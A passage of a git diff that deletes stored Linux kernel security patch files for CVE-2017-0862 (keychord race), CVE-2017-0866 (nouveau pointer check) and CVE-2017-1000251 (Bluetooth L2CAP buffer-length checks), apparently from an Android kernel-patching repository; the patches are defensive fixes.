diff --git a/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch
deleted file mode 100644
index 31c53866..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch
+++ /dev/null
@@ -1,28 +0,0 @@
-From 19384322b5b51987bd6037f7a6b18a62a5d4d654 Mon Sep 17 00:00:00 2001
-From: Jianqiang Zhao
-Date: Mon, 6 Mar 2017 16:33:42 +0800
-Subject: [PATCH] ANDROID: input: keychord: fix race condition bug
-
-Change-Id: I9c7c759c99e21cad9a7f9a09128122bf6ae11302
-Signed-off-by: Jianqiang Zhao
-Bug: 36006779
----
- drivers/input/misc/keychord.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/misc/keychord.c b/drivers/input/misc/keychord.c
-index a5ea27ad0e16c..f580edf1c87ce 100644
---- a/drivers/input/misc/keychord.c
-+++ b/drivers/input/misc/keychord.c
-@@ -300,8 +300,10 @@ static ssize_t keychord_write(struct file *file, const char __user *buffer,
-
- ret = input_register_handler(&kdev->input_handler);
- if (ret) {
-- kfree(keychords);
-+ spin_lock_irqsave(&kdev->lock, flags);
-+ kfree(kdev->keychords);
- kdev->keychords = 0;
-+ spin_unlock_irqrestore(&kdev->lock, flags);
- return ret;
- }
- kdev->registered = 1;
diff --git a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch
deleted file mode 100644
index 51711f30..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch
+++ /dev/null
@@ -1,25 +0,0 @@ -diff --git a/drivers/gpu/drm/nouveau/nouveau_usif.c b/drivers/gpu/drm/nouveau/nouveau_usif.c -index cb1182d..8d4fcc1 100644 ---- a/drivers/gpu/drm/nouveau/nouveau_usif.c -+++ b/drivers/gpu/drm/nouveau/nouveau_usif.c -@@ -316,6 +316,12 @@ - } else - goto done; - -+ object = (void *)(unsigned long)argv->v0.token; -+ if (!access_ok(VERIFY_READ, object, sizeof(struct usif_object))) { -+ ret = -EINVAL; -+ goto done; -+ } -+ - mutex_lock(&cli->mutex); - switch (argv->v0.type) { - case NVIF_IOCTL_V0_NEW: -@@ -340,7 +346,6 @@ - break; - } - if (argv->v0.route == NVDRM_OBJECT_USIF) { -- object = (void *)(unsigned long)argv->v0.token; - argv->v0.route = object->route; - argv->v0.token = object->token; - if (ret == 0 && argv->v0.type == NVIF_IOCTL_V0_DEL) { diff --git a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64 deleted file mode 100644 index 3cc718d5..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch deleted file mode 100644 index 352eafd2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch +++ /dev/null 
@@ -1,403 +0,0 @@ -From 2e073d2001f354982b777a38d931002a62395de1 Mon Sep 17 00:00:00 2001 -From: Ben Seri -Date: Sat, 09 Sep 2017 23:15:59 +0200 -Subject: [PATCH] Bluetooth: Properly check L2CAP config option output buffer length - -Validate the output buffer length for L2CAP config requests and responses -to avoid overflowing the stack buffer used for building the option blocks. - -Change-Id: I7a0ff0b9dd0156c0e6383214a9c86e4ec4c0d236 -Cc: stable@vger.kernel.org -Signed-off-by: Ben Seri -Signed-off-by: Marcel Holtmann -Signed-off-by: Linus Torvalds -CVE-2017-1000251 -Signed-off-by: Kevin F. Haggerty ---- - -diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h -index ef5e849..b868343 100644 ---- a/include/net/bluetooth/l2cap.h -+++ b/include/net/bluetooth/l2cap.h -@@ -668,7 +668,7 @@ - - u8 l2cap_get_ident(struct l2cap_conn *conn); - void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len, void *data); --int l2cap_build_conf_req(struct sock *sk, void *data); -+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size); - int __l2cap_wait_ack(struct sock *sk); - - struct sk_buff *l2cap_create_connless_pdu(struct sock *sk, struct msghdr *msg, size_t len); -diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c -index af0dcba..a4ab0ff 100644 ---- a/net/bluetooth/l2cap_core.c -+++ b/net/bluetooth/l2cap_core.c -@@ -910,7 +910,7 @@ - - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - -@@ -2892,11 +2892,14 @@ - return len; - } - --static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val) -+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size) - { - struct l2cap_conf_opt *opt = *ptr; - - BT_DBG("type 0x%2.2x len %d val 0x%lx", type, len, val); -+ -+ if (size < 
L2CAP_CONF_OPT_SIZE + len) -+ return; - - opt->type = type; - opt->len = len; -@@ -3275,12 +3278,13 @@ - } - } - --int l2cap_build_conf_req(struct sock *sk, void *data) -+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - struct l2cap_conf_rfc rfc = { .mode = pi->mode }; - void *ptr = req->data; -+ void *endptr = data + data_size; - - BT_DBG("sk %p", sk); - -@@ -3301,7 +3305,7 @@ - - done: - if (pi->imtu != L2CAP_DEFAULT_MTU) -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr); - - switch (pi->mode) { - case L2CAP_MODE_BASIC: -@@ -3316,7 +3320,7 @@ - rfc.max_pdu_size = 0; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_MODE_ERTM: -@@ -3333,12 +3337,12 @@ - rfc.max_pdu_size = cpu_to_le16(pi->imtu); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) && - pi->extended_control) { - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, -- pi->tx_win); -+ pi->tx_win, endptr - ptr); - } - - if (pi->amp_id) { -@@ -3346,7 +3350,7 @@ - struct l2cap_conf_ext_fs fs = {1, 1, 0xFFFF, - 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF}; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS, -- sizeof(fs), (unsigned long) &fs); -+ sizeof(fs), (unsigned long) &fs, endptr - ptr); - } - - if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS)) -@@ -3355,7 +3359,7 @@ - if (pi->fcs == L2CAP_FCS_NONE || - pi->conf_state & L2CAP_CONF_NO_FCS_RECV) { - pi->fcs = L2CAP_FCS_NONE; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr); - } - break; - -@@ -3369,11 +3373,11 @@ - rfc.max_pdu_size = cpu_to_le16(pi->imtu); - - l2cap_add_conf_opt(&ptr, 
L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) && - pi->extended_control) { -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0, endptr - ptr); - } - - if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS)) -@@ -3382,7 +3386,7 @@ - if (pi->fcs == L2CAP_FCS_NONE || - pi->conf_state & L2CAP_CONF_NO_FCS_RECV) { - pi->fcs = L2CAP_FCS_NONE; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr); - } - break; - } -@@ -3394,12 +3398,13 @@ - } - - --static int l2cap_build_amp_reconf_req(struct sock *sk, void *data) -+static int l2cap_build_amp_reconf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - struct l2cap_conf_rfc rfc = { .mode = pi->mode }; - void *ptr = req->data; -+ void *endptr = data + data_size; - - BT_DBG("sk %p", sk); - -@@ -3420,7 +3425,7 @@ - } - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if (pi->conn->feat_mask & L2CAP_FEAT_FCS) { - /* TODO assign fcs for br/edr based on socket config option */ -@@ -3431,7 +3436,7 @@ - else - pi->local_conf.fcs = L2CAP_FCS_CRC16; - -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs, endptr - ptr); - pi->fcs = pi->local_conf.fcs | pi->remote_conf.fcs; - } - -@@ -3441,11 +3446,12 @@ - return ptr - data; - } - --static int l2cap_parse_conf_req(struct sock *sk, void *data) -+static int l2cap_parse_conf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_rsp *rsp = data; - void *ptr = rsp->data; -+ void *endptr = data + data_size; - void *req = pi->conf_req; - int len = pi->conf_len; - int type, 
hint, olen; -@@ -3563,7 +3569,8 @@ - return -ECONNREFUSED; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, -+ endptr - ptr); - } - - -@@ -3583,7 +3590,7 @@ - pi->omtu = mtu; - pi->conf_state |= L2CAP_CONF_MTU_DONE; - } -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr); - - switch (rfc.mode) { - case L2CAP_MODE_BASIC: -@@ -3601,11 +3608,11 @@ - pi->conf_state |= L2CAP_CONF_MODE_DONE; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - - if (pi->conf_state & L2CAP_CONF_LOCKSTEP) - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS, -- sizeof(fs), (unsigned long) &fs); -+ sizeof(fs), (unsigned long) &fs, endptr - ptr); - - break; - -@@ -3615,7 +3622,7 @@ - pi->conf_state |= L2CAP_CONF_MODE_DONE; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - - break; - -@@ -3659,11 +3666,12 @@ - return ptr - data; - } - --static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data) -+static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_rsp *rsp = data; - void *ptr = rsp->data; -+ void *endptr = data + data_size; - void *req = pi->conf_req; - int len = pi->conf_len; - int type, hint, olen; -@@ -3750,13 +3758,13 @@ - - BT_DBG("mtu %d omtu %d", mtu, pi->omtu); - -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr); - - /* Don't allow extended transmit window to change. 
*/ - if (tx_win != pi->remote_tx_win) { - result = L2CAP_CONF_UNACCEPT; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, -- pi->remote_tx_win); -+ pi->remote_tx_win, endptr - ptr); - } - - pi->remote_mps = rfc.max_pdu_size; -@@ -3769,7 +3777,7 @@ - } - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - } - - if (result != L2CAP_CONF_SUCCESS) -@@ -3788,11 +3796,12 @@ - return ptr - data; - } - --static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, u16 *result) -+static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, size_t size, u16 *result) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - void *ptr = req->data; -+ void *endptr = data + size; - int type, olen; - unsigned long val; - struct l2cap_conf_rfc rfc; -@@ -3815,13 +3824,13 @@ - pi->imtu = L2CAP_DEFAULT_MIN_MTU; - } else - pi->imtu = val; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr); - break; - - case L2CAP_CONF_FLUSH_TO: - pi->flush_to = val; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO, -- 2, pi->flush_to); -+ 2, pi->flush_to, endptr - ptr); - break; - - case L2CAP_CONF_RFC: -@@ -3835,7 +3844,7 @@ - pi->fcs = 0; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_CONF_EXT_WINDOW: -@@ -3845,7 +3854,7 @@ - pi->tx_win = L2CAP_TX_WIN_MAX_ENHANCED; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, -- 2, pi->tx_win); -+ 2, pi->tx_win, endptr - ptr); - break; - - default: -@@ -4204,7 +4213,7 @@ - u8 buf[128]; - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - 
} - -@@ -4255,7 +4264,7 @@ - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, req), req); -+ l2cap_build_conf_req(sk, req, sizeof(req)), req); - l2cap_pi(sk)->num_conf_req++; - break; - -@@ -4359,9 +4368,9 @@ - - /* Complete config. */ - if (!amp_move_reconf) -- len = l2cap_parse_conf_req(sk, rspbuf); -+ len = l2cap_parse_conf_req(sk, rspbuf, sizeof(rspbuf)); - else -- len = l2cap_parse_amp_move_reconf_req(sk, rspbuf); -+ len = l2cap_parse_amp_move_reconf_req(sk, rspbuf, sizeof(rspbuf)); - - if (len < 0) { - l2cap_send_disconn_req(conn, sk, ECONNRESET); -@@ -4410,7 +4419,7 @@ - u8 buf[64]; - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - -@@ -4506,7 +4515,7 @@ - /* throw out any old stored conf requests */ - result = L2CAP_CONF_SUCCESS; - len = l2cap_parse_conf_rsp(sk, rsp->data, -- len, req, &result); -+ len, req, sizeof(req), &result); - if (len < 0) { - l2cap_send_disconn_req(conn, sk, ECONNRESET); - goto done; -@@ -5306,7 +5315,7 @@ - l2cap_send_cmd(pi->conn, - l2cap_get_ident(pi->conn), - L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - } else { -@@ -6870,7 +6879,7 @@ - pi = l2cap_pi(sk); - - l2cap_send_cmd(pi->conn, l2cap_get_ident(pi->conn), L2CAP_CONF_REQ, -- l2cap_build_amp_reconf_req(sk, buf), buf); -+ l2cap_build_amp_reconf_req(sk, buf, sizeof(buf)), buf); - return err; - } - -diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c -index 6e229d1..aa17999 100644 ---- a/net/bluetooth/l2cap_sock.c -+++ b/net/bluetooth/l2cap_sock.c -@@ -1031,7 +1031,7 @@ - - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, 
-- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - - release_sock(sk); diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64 deleted file mode 100644 index a84e7f2a..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch deleted file mode 100644 index 375cecb9..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch +++ /dev/null 
@@ -1,411 +0,0 @@ -From a8149a65c1db9c3980873a32e4a96331b7a61f5b Mon Sep 17 00:00:00 2001 -From: Ben Seri -Date: Sat, 09 Sep 2017 23:15:59 +0200 -Subject: [PATCH] Bluetooth: Properly check L2CAP config option output buffer length - -Validate the output buffer length for L2CAP config requests and responses -to avoid overflowing the stack buffer used for building the option blocks. - -Change-Id: I7a0ff0b9dd0156c0e6383214a9c86e4ec4c0d236 -Cc: stable@vger.kernel.org -Signed-off-by: Ben Seri -Signed-off-by: Marcel Holtmann -Signed-off-by: Linus Torvalds -CVE-2017-1000251 -Signed-off-by: Kevin F. Haggerty ---- - -diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h -index 9c2b735..8e281b4 100644 ---- a/include/net/bluetooth/l2cap.h -+++ b/include/net/bluetooth/l2cap.h -@@ -670,7 +670,7 @@ - - u8 l2cap_get_ident(struct l2cap_conn *conn); - void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len, void *data); --int l2cap_build_conf_req(struct sock *sk, void *data); -+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size); - int __l2cap_wait_ack(struct sock *sk); - - struct sk_buff *l2cap_create_connless_pdu(struct sock *sk, struct msghdr *msg, size_t len); -diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c -index a554160..aba12f2 100644 ---- a/net/bluetooth/l2cap_core.c -+++ b/net/bluetooth/l2cap_core.c -@@ -926,7 +926,7 @@ - - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - -@@ -2923,11 +2923,14 @@ - return len; - } - --static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val) -+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size) - { - struct l2cap_conf_opt *opt = *ptr; - - BT_DBG("type 0x%2.2x len %d val 0x%lx", type, len, val); -+ -+ if (size < 
L2CAP_CONF_OPT_SIZE + len) -+ return; - - opt->type = type; - opt->len = len; -@@ -3312,12 +3315,13 @@ - } - } - --int l2cap_build_conf_req(struct sock *sk, void *data) -+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - struct l2cap_conf_rfc rfc = { .mode = pi->mode }; - void *ptr = req->data; -+ void *endptr = data + data_size; - - BT_DBG("sk %p mode %d", sk, pi->mode); - -@@ -3338,7 +3342,7 @@ - - done: - if (pi->imtu != L2CAP_DEFAULT_MTU) -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr); - - switch (pi->mode) { - case L2CAP_MODE_BASIC: -@@ -3352,7 +3356,7 @@ - rfc.max_pdu_size = 0; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_MODE_ERTM: -@@ -3369,12 +3373,12 @@ - rfc.max_pdu_size = cpu_to_le16(pi->imtu); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) && - pi->extended_control) { - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, -- pi->tx_win); -+ pi->tx_win, endptr - ptr); - } - - if (pi->amp_id) { -@@ -3382,7 +3386,7 @@ - struct l2cap_conf_ext_fs fs = {1, 1, 0xFFFF, - 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF}; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS, -- sizeof(fs), (unsigned long) &fs); -+ sizeof(fs), (unsigned long) &fs, endptr - ptr); - } - - if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS)) -@@ -3391,7 +3395,7 @@ - if (pi->fcs == L2CAP_FCS_NONE || - pi->conf_state & L2CAP_CONF_NO_FCS_RECV) { - pi->fcs = L2CAP_FCS_NONE; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr); - } - break; - -@@ -3406,11 +3410,11 @@ - rfc.max_pdu_size = cpu_to_le16(pi->imtu); - - 
l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) && - pi->extended_control) { -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0, endptr - ptr); - } - - if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS)) -@@ -3419,7 +3423,7 @@ - if (pi->fcs == L2CAP_FCS_NONE || - pi->conf_state & L2CAP_CONF_NO_FCS_RECV) { - pi->fcs = L2CAP_FCS_NONE; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr); - } - break; - } -@@ -3431,12 +3435,13 @@ - } - - --static int l2cap_build_amp_reconf_req(struct sock *sk, void *data) -+static int l2cap_build_amp_reconf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - struct l2cap_conf_rfc rfc = { .mode = pi->mode }; - void *ptr = req->data; -+ void *endptr = data + data_size; - - BT_DBG("sk %p", sk); - -@@ -3457,7 +3462,7 @@ - } - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if (pi->conn->feat_mask & L2CAP_FEAT_FCS) { - /* TODO assign fcs for br/edr based on socket config option */ -@@ -3468,7 +3473,7 @@ - else - pi->local_conf.fcs = L2CAP_FCS_CRC16; - -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs, endptr - ptr); - pi->fcs = pi->local_conf.fcs | pi->remote_conf.fcs; - } - -@@ -3478,11 +3483,12 @@ - return ptr - data; - } - --static int l2cap_parse_conf_req(struct sock *sk, void *data) -+static int l2cap_parse_conf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_rsp *rsp = data; - void *ptr = rsp->data; -+ void *endptr = data + data_size; - void *req = pi->conf_req; - int len = 
pi->conf_len; - int type, hint, olen; -@@ -3605,7 +3611,8 @@ - return -ECONNREFUSED; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, -+ endptr - ptr); - } - - -@@ -3624,7 +3631,7 @@ - pi->omtu = mtu; - pi->conf_state |= L2CAP_CONF_MTU_DONE; - } -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr); - - switch (rfc.mode) { - case L2CAP_MODE_BASIC: -@@ -3642,11 +3649,11 @@ - pi->conf_state |= L2CAP_CONF_MODE_DONE; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - - if (pi->conf_state & L2CAP_CONF_LOCKSTEP) - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS, -- sizeof(fs), (unsigned long) &fs); -+ sizeof(fs), (unsigned long) &fs, endptr - ptr); - - break; - -@@ -3656,7 +3663,7 @@ - pi->conf_state |= L2CAP_CONF_MODE_DONE; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - - break; - -@@ -3696,11 +3703,12 @@ - return ptr - data; - } - --static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data) -+static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data, size_t data_size) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_rsp *rsp = data; - void *ptr = rsp->data; -+ void *endptr = data + data_size; - void *req = pi->conf_req; - int len = pi->conf_len; - int type, hint, olen; -@@ -3787,13 +3795,13 @@ - - BT_DBG("mtu %d omtu %d", mtu, pi->omtu); - -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr); - - /* Don't allow extended transmit window to change. 
*/ - if (tx_win != pi->remote_tx_win) { - result = L2CAP_CONF_UNACCEPT; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, -- pi->remote_tx_win); -+ pi->remote_tx_win, endptr - ptr); - } - - pi->remote_mps = rfc.max_pdu_size; -@@ -3806,7 +3814,7 @@ - } - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - } - - if (result != L2CAP_CONF_SUCCESS) -@@ -3825,11 +3833,12 @@ - return ptr - data; - } - --static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, u16 *result) -+static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, size_t size, u16 *result) - { - struct l2cap_pinfo *pi = l2cap_pi(sk); - struct l2cap_conf_req *req = data; - void *ptr = req->data; -+ void *endptr = data + size; - int type, olen; - unsigned long val; - struct l2cap_conf_rfc rfc; -@@ -3852,13 +3861,13 @@ - pi->imtu = L2CAP_DEFAULT_MIN_MTU; - } else - pi->imtu = val; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr); - break; - - case L2CAP_CONF_FLUSH_TO: - pi->flush_to = val; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO, -- 2, pi->flush_to); -+ 2, pi->flush_to, endptr - ptr); - break; - - case L2CAP_CONF_RFC: -@@ -3872,14 +3881,14 @@ - pi->fcs = 0; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_CONF_EXT_WINDOW: - pi->ack_win = min_t(u16, val, pi->ack_win); - - l2cap_add_conf_opt(&ptr, 